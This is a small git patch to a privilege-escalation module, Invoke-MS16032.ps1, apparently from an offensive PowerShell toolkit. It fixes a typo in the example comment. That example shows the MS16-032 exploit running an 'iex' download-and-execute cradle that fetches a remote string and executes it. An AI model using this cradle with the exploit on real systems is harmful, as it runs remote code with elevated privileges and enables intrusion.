From aeb41619df3d8c5ab5def6fdb85dceb98d6b4021 Mon Sep 17 00:00:00 2001 From: mschader Date: Sun, 28 Oct 2018 12:54:11 +0100 Subject: [PATCH] Invoke-MS16032.ps1: Fix example comment by removing additional dash --- data/module_source/privesc/Invoke-MS16032.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/module_source/privesc/Invoke-MS16032.ps1 b/data/module_source/privesc/Invoke-MS16032.ps1 index fbdbc7ac9..681a23f7b 100644 --- a/data/module_source/privesc/Invoke-MS16032.ps1 +++ b/data/module_source/privesc/Invoke-MS16032.ps1 @@ -36,7 +36,7 @@ function Invoke-MS16032 { .EXAMPLE - C:\PS> Invoke-MS16-032 -Command "iex(New-Object Net.WebClient).DownloadString('http://google.com')" + C:\PS> Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://google.com')" Description -----------